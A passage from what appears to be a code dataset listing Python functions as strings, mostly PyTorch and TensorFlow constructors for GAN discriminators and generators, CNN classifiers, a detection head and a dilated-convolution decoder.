has affine parameters\n use_bias = norm_layer.func == nn.InstanceNorm2d\n else:\n use_bias = norm_layer == nn.InstanceNorm2d\n\n kw = 4\n padw = 1\n sequence = [nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=2, padding=padw), nn.LeakyReLU(0.2, True)]\n nf_mult = 1\n nf_mult_prev = 1\n for n in range(1, n_layers): # gradually increase the number of filters\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n, 8)\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=2, padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)\n ]\n\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n_layers, 8)\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=1, padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)\n ]\n\n sequence += [nn.Conv2d(ndf * nf_mult, 1, kernel_size=kw, stride=1, padding=padw)] # output 1 channel prediction map\n self.model = nn.Sequential(*sequence)\n self.sigmoid = nn.Sigmoid()", "def __init__(self, input_nc, opt_net,ndf=64, n_layers=DEFAULT_N_LAYERS, norm_layer=nn.BatchNorm2d):\n super(PatchGAN_Discriminator, self).__init__()\n if type(norm_layer) == functools.partial: # no need to use bias as BatchNorm2d has affine parameters\n use_bias = norm_layer.func != nn.BatchNorm2d\n else:\n use_bias = norm_layer != nn.BatchNorm2d\n\n self.decomposed_input = bool(opt_net['decomposed_input'])\n self.pre_clipping = bool(opt_net['pre_clipping'])\n projected_component_sequences = []\n in_ch_addition = input_nc if self.decomposed_input else 0\n kw = 4\n padw = 1\n max_out_channels = 512\n sequences = [nn.Sequential(*[nn.Conv2d(input_nc+in_ch_addition, ndf, kernel_size=kw, stride=2, padding=padw), nn.LeakyReLU(0.2, True)])]\n # if self.decomposed_input:\n # projected_component_sequences = [nn.Conv2d(input_nc, input_nc, kernel_size=kw, stride=2, padding=padw)]\n\n nf_mult = 1\n nf_mult_prev = 1\n for n in range(1, n_layers): # gradually increase the number of filters\n # nf_mult_prev = nf_mult\n # nf_mult = min(2 ** max(0,n-n_layers+self.DEFAULT_N_LAYERS), 8)\n nf_mult_prev = min(max_out_channels, ndf * nf_mult) // ndf\n nf_mult = min(2 ** n, 8)\n sequences.append(nn.Sequential(*[\n nn.Conv2d(ndf * nf_mult_prev+in_ch_addition, min(max_out_channels, ndf * nf_mult), kernel_size=kw,\n stride=2 if n > n_layers - self.DEFAULT_N_LAYERS else 1,\n padding=padw, bias=use_bias), norm_layer(ndf * nf_mult), nn.LeakyReLU(0.2, True)]))\n # if self.decomposed_input:\n # 
projected_component_sequences.append(\n # nn.Conv2d(input_nc,input_nc, kernel_size=kw,\n # stride=2 if n > n_layers - self.DEFAULT_N_LAYERS else 1,\n # padding=padw, bias=use_bias))\n\n # nf_mult_prev = nf_mult\n nf_mult_prev = min(max_out_channels, ndf * nf_mult) // ndf\n nf_mult = min(2 ** n_layers, 8)\n sequences.append(nn.Sequential(*[\n nn.Conv2d(ndf * nf_mult_prev+in_ch_addition, min(max_out_channels, ndf * nf_mult), kernel_size=kw, stride=1,\n padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)]))\n # if self.decomposed_input:\n # projected_component_sequences.append(\n # nn.Conv2d(input_nc,input_nc, kernel_size=kw, stride=1,\n # padding=padw, bias=use_bias))\n sequences.append(nn.Sequential(*[\n nn.Conv2d(min(max_out_channels, ndf * nf_mult)+in_ch_addition, 1, kernel_size=kw, stride=1,\n padding=padw)])) # output 1 channel prediction map\n self.num_modules = len(sequences)\n if self.decomposed_input:\n for seq in sequences:\n conv_stride = [child.stride[0] for child in seq.children() if 'Conv2d' in str(child.__class__)]\n assert len(conv_stride)<=1,'More than one conv layer in seq?'\n if len(conv_stride)>0:\n projected_component_sequences.append(nn.Conv2d(input_nc,input_nc, kernel_size=kw, stride=conv_stride[0],\n padding=padw, bias=use_bias))\n self.model = nn.ModuleList(sequences+projected_component_sequences)", "def __init__(self, input_nc, ndf=64, n_layers=3, norm_layer=nn.BatchNorm2d):\n super(NLayerDiscriminator, self).__init__()\n if type(norm_layer) == functools.partial: # no need to use bias as BatchNorm2d has affine parameters\n use_bias = norm_layer.func != nn.BatchNorm2d\n else:\n use_bias = norm_layer != nn.BatchNorm2d\n\n kw = 4\n padw = 1\n sequence = [nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=2, padding=padw), nn.LeakyReLU(0.2, True)]\n nf_mult = 1\n nf_mult_prev = 1\n for n in range(1, n_layers): # gradually increase the number of filters\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n, 8)\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=2, padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)\n ]\n\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n_layers, 8)\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=1, padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)\n ]\n\n sequence += [nn.Conv2d(ndf * nf_mult, 1, kernel_size=kw, stride=1, padding=padw)] # output 1 channel prediction map\n self.model = nn.Sequential(*sequence)", "def _init_layers(self):\n self.relu = nn.ReLU(inplace=True)\n self.rpn_convs = nn.ModuleList()\n for i in range(self.stacked_convs):\n chn = self.in_channels if i == 0 else self.feat_channels\n self.rpn_convs.append(\n ConvModule(\n chn,\n self.feat_channels,\n 3,\n stride=1,\n padding=1,\n conv_cfg=self.conv_cfg,\n norm_cfg=self.norm_cfg))\n self.rpn_cls = nn.Conv2d(\n self.feat_channels, self.num_anchors * 1, 3, padding=1)\n self.rpn_reg = nn.Conv2d(\n self.feat_channels, self.num_anchors * 4 * (self.reg_max + 1), 3, padding=1)\n self.rpn_iou = nn.Conv2d(\n self.feat_channels, self.num_anchors * 1, 3, padding=1)\n self.scales = nn.ModuleList(\n [Scale(1.0) for _ in self.anchor_generator.strides])\n\n ##############V2################\n conf_vector = [nn.Conv2d(self.num_anchors * 4 * self.total_dim, self.num_anchors * self.reg_channels, 1)]\n conf_vector += [self.relu]\n conf_vector += [nn.Conv2d(self.num_anchors * self.reg_channels, self.num_anchors, 1), nn.Sigmoid()]\n\n 
self.reg_conf = nn.Sequential(*conf_vector)\n ##############V2################", "def create(self):\n # 1st Layer: Conv -> norm -> ReLu\n conv1 = self.conv(x=self.X, stride_y=1, stride_x=1, padding='SAME', name='conv1')\n norm1 = lrn(conv1, 2, 1e-04, 0.75, name='norm1')\n # Apply relu function\n relu1 = tf.nn.relu(norm1)\n\n # 2st Layer: Conv -> norm -> ReLu\n conv2 = self.conv(x=relu1, stride_y=1, stride_x=1, padding='SAME', name='conv2')\n norm2 = lrn(conv2, 2, 1e-04, 0.75, name='norm2')\n # Apply relu function\n relu2 = tf.nn.relu(norm2)\n\n pool2 = tf.nn.max_pool(relu2, ksize=[1, 3, 3, 1],\n strides=[1, 2, 2, 1],\n padding='SAME')\n\n # 3st Layer: Conv -> norm -> ReLu\n conv3 = self.conv(x=pool2, stride_y=1, stride_x=1, padding='SAME', name='conv3')\n norm3 = lrn(conv3, 2, 1e-04, 0.75, name='norm3')\n # Apply relu function\n relu3 = tf.nn.relu(norm3)\n\n # 4st Layer: Conv -> norm -> ReLu\n conv4 = self.conv(x=relu3, stride_y=1, stride_x=1, padding='SAME', name='conv4')\n norm4 = lrn(conv4, 2, 1e-04, 0.75, name='norm4')\n # Apply relu function\n relu4 = tf.nn.relu(norm4)\n\n pool4 = tf.nn.max_pool(relu4, ksize=[1, 3, 3, 1],\n strides=[1, 2, 2, 1],\n padding='SAME')\n\n # 5st Layer: Conv -> norm -> ReLu\n conv5 = self.conv(x=pool4, stride_y=1, stride_x=1, padding='SAME', name='conv5')\n norm5 = lrn(conv5, 2, 1e-04, 0.75, name='norm5')\n # Apply relu function\n relu5 = tf.nn.relu(norm5)\n\n # 6st Layer: Conv -> norm -> ReLu\n conv6 = self.conv(x=relu5, stride_y=1, stride_x=1, padding='SAME', name='conv6')\n norm6 = lrn(conv6, 2, 1e-04, 0.75, name='norm6')\n # Apply relu function\n relu6 = tf.nn.relu(norm6)\n\n pool6 = tf.nn.avg_pool(relu6, ksize=[1, 4, 4, 1],\n strides=[1, 4, 4, 1],\n padding='SAME')\n\n flattened = tf.reshape(pool6, [-1, 128 * 4])\n self.fc7 = self.fc(flattened, name='fc7')", "def __init__(self, n_filters, n_units_hidden):\n super(MNISTNet, self).__init__()\n self.conv = nn.Conv2d(1, n_filters, kernel_size=3)\n self.pool = nn.MaxPool2d(2)\n self.fc1 = nn.Linear(n_filters * 13 * 13, n_units_hidden)\n self.fc2 = nn.Linear(n_units_hidden, 10)", "def example():\n base_path = Path(TMPDIR)\n\n discriminator = Model(num_input=28 * 28)\n discriminator.add(Layer(512, activation=af.RELU))\n discriminator.add(Layer(1, activation=af.SIGMOID))\n\n generator_discriminator = Model(num_input=100)\n generator_discriminator.add(Layer(512, activation=af.LEAKY_RELU))\n generator_discriminator.add(Layer(28 * 28, activation=af.SIGMOID))\n generator_discriminator.add(Layer(512, activation=af.RELU)) # Needs to match discriminator\n generator_discriminator.add(Layer(1, activation=af.SIGMOID)) # Needs to match discriminator\n\n nn_discriminator = NeuralNetwork(discriminator, learning_rate=0.0002, cost_function=cf.CROSS_ENTROPY,\n\n optimizer=opt.ADAM,\n optimizer_settings=AdamOptimizer(beta1=0.5, beta2=0.999, epsilon=1e-8),\n batch_size=32)\n\n discriminator_weight_path = Path(DISCRIMINATOR_WEIGHTS_FILE_PATH)\n if discriminator_weight_path.exists():\n log.info(\"Discriminator weight file detected. 
Loading.\")\n nn_discriminator.load(discriminator_weight_path)\n\n nn_generator_discriminator = NeuralNetwork(generator_discriminator,\n use_layer_from=[{\"model\": nn_discriminator,\n \"layer_map\": [{\"from\": 1, \"to\": 3},\n {\"from\": 2, \"to\": 4}]}],\n\n learning_rate=0.0002, cost_function=cf.CROSS_ENTROPY, # Slower than D\n optimizer=opt.ADAM,\n optimizer_settings=AdamOptimizer(beta1=0.5, beta2=0.999, epsilon=1e-8),\n batch_size=32,\n weight_parameter=wparam(init_type=wparam.NORMAL, stddev=0.02))\n\n generator_weight_path = Path(GENERATOR_WEIGHTS_FILE_PATH)\n if generator_weight_path.exists():\n log.info(\"Generator weight file detected. Loading.\")\n nn_generator_discriminator.load(generator_weight_path)\n\n noise = np.random.normal(size=(NUM_IMAGES_TO_GENERATE, 100))\n\n print(\"Generating...\")\n test_images = nn_generator_discriminator.predict_intermediate(noise, 2)\n\n for p in range(test_images.shape[0]):\n img = test_images[p].reshape((28, 28)).copy()\n img *= 255.0\n img_pil = Image.fromarray(np.uint8(img))\n image_path = base_path / Path(\"%d.jpg\" % (p))\n img_pil.save(image_path)", "def compile(self):\n m, n = self.input_shape[1], self.input_shape[2]\n\n inp = Input(shape=self.input_shape, traces=True)\n self.add_layer(inp, \"DoG\")\n\n s1 = LIFNodes(shape=(18, m, n), traces=True)\n self.add_layer(s1, \"conv_1\")\n c1 = LIFNodes(shape=(18, m // 2, n // 2), traces=True)\n self.add_layer(c1, \"pool_1\")\n\n s2 = LIFNodes(shape=(24, m // 2, n // 2), traces=True)\n self.add_layer(s2, \"conv_2\")\n c2 = LIFNodes(shape=(24, m // 4, n // 4), traces=True)\n self.add_layer(c2, \"pool_2\")\n\n s3 = LIFNodes(shape=(32, m // 4, n // 4), traces=True)\n self.add_layer(s3, \"conv_3\")\n f = LIFNodes(shape=(32, 1), traces=True)\n self.add_layer(f, \"global_pool\")\n\n conv1 = Conv2dConnection(inp, s1, 5, padding=2, weight_decay=0.01,\n nu=0.01, update_rule=PostPre, decay=0.5)\n self.add_connection(conv1, \"DoG\", \"conv_1\")\n pool1 = MaxPool2dConnection(s1, c1, 2, 2, decay=0.5)\n self.add_connection(pool1, \"conv_1\", \"pool_1\")\n\n conv2 = Conv2dConnection(c1, s2, 3, padding=1, weight_decay=0.01,\n nu=0.01, update_rule=PostPre, decay=0.5)\n self.add_connection(conv2, \"pool_1\", \"conv_2\")\n pool2 = MaxPool2dConnection(s2, c2, 2, 2, decay=0.5)\n self.add_connection(pool2, \"conv_2\", \"pool_2\")\n\n conv3 = Conv2dConnection(c2, s3, 3, padding=1, weight_decay=0.01,\n nu=0.01, update_rule=PostPre, decay=0.5)\n self.add_connection(conv3, \"pool_2\", \"conv_3\")\n global_pool = MaxPool2dConnection(s3, f, (m // 4, n // 4), decay=0.5)\n self.add_connection(global_pool, \"conv_3\", \"global_pool\")\n\n monitor = NetworkMonitor(self, layers=[\"DoG\", \"conv_1\", \"pool_1\",\n \"conv_2\", \"pool_2\",\n \"conv_3\", \"global_pool\"],\n connections=[(\"DoG\", \"conv_1\"),\n (\"pool_1\", \"conv_2\"),\n (\"pool_2\", \"conv_3\")],\n state_vars=[\"w\", \"s\"])\n self.add_monitor(monitor, \"network_monitor\")\n\n return self", "def __init__(self):\n\n super(ConvModule, self).__init__()\n\n self.conv1 = nn.Conv2d(in_channels=1, out_channels=64, kernel_size=5, stride=[1, 2])\n self.conv1_bn = nn.BatchNorm2d(64)\n self.conv2 = nn.Conv2d(in_channels=64, out_channels=128, kernel_size=5, stride=[1, 2])\n self.conv2_bn = nn.BatchNorm2d(128)\n self.pool1 = nn.MaxPool2d(kernel_size=4, stride=2)\n self.dropout0 = nn.Dropout(p=0.4)\n\n self.conv3 = nn.Conv2d(in_channels=128, out_channels=256, kernel_size=3, stride=[1, 2])\n self.conv3_bn = nn.BatchNorm2d(256)\n self.conv4 = nn.Conv2d(in_channels=256, 
out_channels=64, kernel_size=3, stride=[1, 2])\n self.conv4_bn = nn.BatchNorm2d(64)\n self.pool2 = nn.MaxPool2d(kernel_size=4, stride=2)\n #\n # self.conv5 = nn.Conv2d(in_channels=128, out_channels=64, kernel_size=3, stride=[1, 2])\n # self.conv5_bn = nn.BatchNorm2d(64)\n # self.pool3 = nn.MaxPool2d(kernel_size=3, stride=[1, 2])", "def __init__(self,\n image_channels,\n num_classes,\n kernel_size,\n padding,\n n_filters):\n super().__init__()\n\n self.num_classes = num_classes\n \n # new parameters\n self.kernel_size = kernel_size\n self.padding = padding\n self.n_filters = n_filters\n \n\n # Define the convolutional layers\n self.feature_extractor = nn.Sequential(\n nn.Conv2d(in_channels=image_channels, out_channels=self.n_filters[0], kernel_size=self.kernel_size, stride=1, padding=self.padding),\n nn.ReLU(inplace=True),\n nn.BatchNorm2d(num_features=self.n_filters[0]),\n nn.MaxPool2d(kernel_size=2, stride=2),\n \n nn.Conv2d(in_channels=self.n_filters[0], out_channels=self.n_filters[1], kernel_size=self.kernel_size, stride=1, padding=self.padding),\n nn.ReLU(inplace=True),\n nn.BatchNorm2d(num_features=self.n_filters[1]),\n nn.MaxPool2d(kernel_size=2, stride=2),\n \n nn.Conv2d(in_channels=self.n_filters[1], out_channels=self.n_filters[2], kernel_size=self.kernel_size, stride=1, padding=self.padding),\n nn.ReLU(inplace=True),\n nn.BatchNorm2d(num_features=self.n_filters[2]),\n nn.Conv2d(in_channels=self.n_filters[2], out_channels=self.n_filters[3], kernel_size=self.kernel_size, stride=1, padding=self.padding),\n nn.ReLU(inplace=True),\n nn.BatchNorm2d(num_features=self.n_filters[3]),\n nn.MaxPool2d(kernel_size=2, stride=2)\n )\n \n # the feature_extractor outputs [num_classes, 128, 4, 4]\n self.num_output_features = self.n_filters[3]*4*4\n \n # Define the fully-connected layers\n self.classifier = nn.Sequential(\n nn.Dropout(),\n nn.Linear(self.num_output_features, 64),\n nn.ReLU(inplace=True),\n nn.BatchNorm1d(num_features=64),\n nn.Dropout(),\n nn.Linear(64, 10)\n )", "def __init__(self,\n image_channels,\n num_classes,\n kernel_size,\n padding,\n n_filters):\n super().__init__()\n\n self.num_classes = num_classes\n \n # new parameters\n self.kernel_size = kernel_size\n self.padding = padding\n self.n_filters = n_filters\n \n\n # Define the convolutional layers\n self.feature_extractor = nn.Sequential(\n nn.Conv2d(in_channels=image_channels, out_channels=self.n_filters[0], kernel_size=self.kernel_size, stride=1, padding=self.padding),\n nn.ReLU(inplace=True),\n nn.BatchNorm2d(num_features=self.n_filters[0]),\n nn.MaxPool2d(kernel_size=2, stride=2),\n \n nn.Conv2d(in_channels=self.n_filters[0], out_channels=self.n_filters[1], kernel_size=self.kernel_size, stride=1, padding=self.padding),\n nn.ReLU(inplace=True),\n nn.BatchNorm2d(num_features=self.n_filters[1]),\n nn.MaxPool2d(kernel_size=2, stride=2),\n \n nn.Conv2d(in_channels=self.n_filters[1], out_channels=self.n_filters[2], kernel_size=self.kernel_size, stride=1, padding=self.padding),\n nn.ReLU(inplace=True),\n nn.BatchNorm2d(num_features=self.n_filters[2]),\n nn.Conv2d(in_channels=self.n_filters[2], out_channels=self.n_filters[3], kernel_size=self.kernel_size, stride=1, padding=self.padding),\n nn.ReLU(inplace=True),\n nn.BatchNorm2d(num_features=self.n_filters[3]),\n nn.MaxPool2d(kernel_size=2, stride=2)\n )\n \n # the feature_extractor outputs [num_classes, 128, 4, 4]\n self.num_output_features = self.n_filters[3]*4*4\n \n # Define the fully-connected layers\n self.classifier = nn.Sequential(\n nn.Linear(self.num_output_features, 
64),\n nn.ReLU(inplace=True),\n nn.BatchNorm1d(num_features=64),\n nn.Linear(64, 10)\n )", "def __init__(self, num_gpus):\n\n super(Generator, self).__init__()\n n_in = Z\n n_out = IMG_CHANNELS\n\n feature_map = IMG_SIZE\n kernel_size = 4\n stride = 2\n padding = 1\n bias = False\n\n self.num_gpus = num_gpus\n\n self.network = nn.Sequential(\n # input is latent variable space Z\n nn.ConvTranspose2d(n_in, feature_map * 8, kernel_size, 1, 0, bias=bias),\n nn.BatchNorm2d(feature_map * 8),\n nn.ReLU(inplace=True),\n\n # nodes = feature_map * 4\n nn.ConvTranspose2d(feature_map * 8, feature_map * 4, kernel_size, stride, padding, bias=bias),\n nn.BatchNorm2d(feature_map * 4),\n nn.ReLU(inplace=True),\n\n # nodes = feature_map * 2\n nn.ConvTranspose2d(feature_map * 4, feature_map * 2, kernel_size, stride, padding, bias=bias),\n nn.BatchNorm2d(feature_map * 2),\n nn.ReLU(inplace=True),\n\n # nodes = feature_map\n nn.ConvTranspose2d(feature_map * 2, feature_map, kernel_size, stride, padding, bias=bias),\n nn.BatchNorm2d(feature_map),\n nn.ReLU(inplace=True),\n\n # nodes = output image size\n nn.ConvTranspose2d(feature_map, n_out, kernel_size, stride, padding, bias=bias),\n nn.Tanh()\n )", "def __init__(self):\n super(Decoder_1m, self).__init__()\n self.lconvtwos = nn.ModuleList(\n [\n nn.Sequential(\n nn.Dropout(p=0.1),\n nn.Conv2d(128, 32, kernel_size=(3, 3), padding=1),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=1),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(32),\n 
nn.Conv2d(32, 64, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(64),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(32),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(64),\n ),\n ]\n )\n\n self.convtwos = nn.ModuleList(\n [\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=1),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=1),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=4, dilation=4),\n 
nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=2, dilation=2),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=4, dilation=4),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=8, dilation=8),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=16, dilation=16),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=32, dilation=32),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n nn.Sequential(\n nn.Conv2d(64, 32, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(32),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, kernel_size=(3, 3), padding=64, dilation=64),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n ]\n )\n self.final = nn.Sequential(\n nn.Conv2d(64, 5, kernel_size=(1, 1), padding=0),\n nn.BatchNorm2d(5),\n nn.ReLU(inplace=True),\n nn.Conv2d(5, 1, kernel_size=(1, 1), padding=0),\n )", "def __init__(self, num_gpus):\n\n super(Discriminator, 